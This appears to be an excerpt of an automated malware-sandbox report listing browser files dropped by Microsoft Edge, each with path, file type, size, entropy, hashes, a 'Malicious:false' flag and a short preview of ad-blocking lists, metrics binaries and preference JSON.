                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6768F3F8-1EE0.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04455415180585823
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:UxL0pqtm0nOAWVqYCKJgA8x5XSggykfhbNNETMIB/0TQsZoRaen8y08Tcm2RGOdB:KL0ctvMaKgk9hZ6Wton08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:70D20094F559192B0A26FEBB01B7B077
                                                                                                                                                                                                                                                                                                  SHA1:01C0763D5A25F2153106A06DA218DEDB38012252
                                                                                                                                                                                                                                                                                                  SHA-256:EFA759B2BB74D30F6DF605D813438A0BE6EEF43C8522B5B838D035673B864679
                                                                                                                                                                                                                                                                                                  SHA-512:CABFCAD97464415E02F1CEA8B57453E66BD458858C29A83EFAA136A7EAF7F74BFFF2B6661B5BA19E39DC9672D2D068D49E72C24A95599BD8AEDC44058D3833C2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............Hc...S..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jchcua20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6768F403-1624.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.43115544552009233
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:NrgrhkrSLQeq2oSy6xWG+aLvdF5rb8eto9S9FqoV6cNlg1HF:6rOLeqriWG+aL5to9S9FqoV6cNlaH
                                                                                                                                                                                                                                                                                                  MD5:8F48CA82D4CCAC7C7234768750921380
                                                                                                                                                                                                                                                                                                  SHA1:5478B29E5B8F808AA74DD0002962957ACDF007D6
                                                                                                                                                                                                                                                                                                  SHA-256:25FE646D46F025D651A1ED74C5D7B12D49FFDAB25DA28CBFD226340526A18C01
                                                                                                                                                                                                                                                                                                  SHA-512:596F5EAF71FAFCA3C29BC37B9BCAF102C2FD62496B92F2BF4E08B3D2293B3411E60B769F115E6BDE653F3CE3B117190958B1F8AC38C8F194AB5D26C09C8320F4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................U..PU..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jchcua20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6768F403-1CF0.pma

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04486118184027462
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:ppNCZ0pqtm0nOAWVqYFJgA8x5XSggykHzhuB0NEVIV/ERQcQGwKcn8y08Tcm2RGY:oZ0ctvM9gk5h60vYTwP08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:E93B46EA4EBB7700E0CDF167AE21F4FA
                                                                                                                                                                                                                                                                                                  SHA1:F8BDA5E0B6F4702EDB9CBE9D4AD9430365E78286
                                                                                                                                                                                                                                                                                                  SHA-256:D672FC0C7528FEF9DAF4193C9AB573959D4B175D278C943D3E87C04BE4C5670A
                                                                                                                                                                                                                                                                                                  SHA-512:9220B5C527A2DAF78181DA04193E4428E38438194579F4EECA897A1C2E0EBDD2B910E9795628EE401662DD25853E1A87430767A04A4F3EE5F35FC3FB211BC9D0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............pe..(U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jchcua20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                                  MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                                  SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                                  SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                                  SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1852d67f-58a0-4a06-8f07-2211a6dce63f.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\21916df4-e906-4cc3-8b76-99ea3d62d647.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4da4a212-c542-4161-92e4-d4abc7bf750b.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5b4d1221-a0ed-4a6e-99f9-465c4d1afa43.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17683), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.489705678064998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:st3PGKSu4os4hfh+7qpb3ywsbG7Qwp6WclaTYf:slOxuHhfkKWbGUiCaTYf
                                                                                                                                                                                                                                                                                                  MD5:3A59956DCF66B67CEA8D0B2F4EB17A42
                                                                                                                                                                                                                                                                                                  SHA1:023238F3551F997F6ED2696A13E996D85D3601E1
                                                                                                                                                                                                                                                                                                  SHA-256:A21F4F19ED1D6DB31D5FB5044E0A472FCEA43554CD9772AA59F14AB7D7871086
                                                                                                                                                                                                                                                                                                  SHA-512:2278DADB953B336B5703306DE4545EC3F3A9FD1FB90510B029879F4E2D10C09D3DCD533BA464164920D07E9824D2B3185500D59B17E1894C65C70BCBFC3F45C1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7309c1fb-ed6a-480a-be99-8284141127f3.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561433778529403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WUxl/V7pLGLh2YWPrXfnd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCHgXWKsrws6Pxf:WUxl/jch2YWPrXfndu1jafHgmKFs6Py0
                                                                                                                                                                                                                                                                                                  MD5:B7F5AA93176187EBC640121E430E413F
                                                                                                                                                                                                                                                                                                  SHA1:96E60D488455461C8792817057F50938DCA7845E
                                                                                                                                                                                                                                                                                                  SHA-256:C993241C957A33F99B6CC8B7CE8DDBA9AF5D9FAE09BDD4D2C2493A8413F6B6B0
                                                                                                                                                                                                                                                                                                  SHA-512:8169920184EDAF80B8CD88A7DA061989DC6881A0DBC13C3438627446F7866095B15595D86B43FBA2EC70B518C5EBEC83C571B8FA82576D60F545F6833B23AD27
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7c5e3f54-2189-411b-8adb-6d1944ae00f5.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17518), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17519
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.493141768502774
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:st3PGKSu4os4hfh+7qpb3ywsbG7Qwp6WuaTYf:slOxuHhfkKWbGUiyaTYf
                                                                                                                                                                                                                                                                                                  MD5:AC4D8AFD8D481FED2D2842DD7BB52E9E
                                                                                                                                                                                                                                                                                                  SHA1:2B3963D9D4B937AE9148286FA09E41FCD94BA5C9
                                                                                                                                                                                                                                                                                                  SHA-256:E8BB0A1D7B30AD0E555BB63E6C1D62529E8B925F17F6A3DB4DB388EDD2FA5BC0
                                                                                                                                                                                                                                                                                                  SHA-512:7540F197A0144973D5E56663B2B0A0DD57D83D4C4F441B170F42FE10C097832E190B7EA08B75BD0F8D4007EC749B5B2311F914666C6E533CD2F44DE1E240C8EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\894d8fbe-3f31-4596-badf-63e08cc1f3e2.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
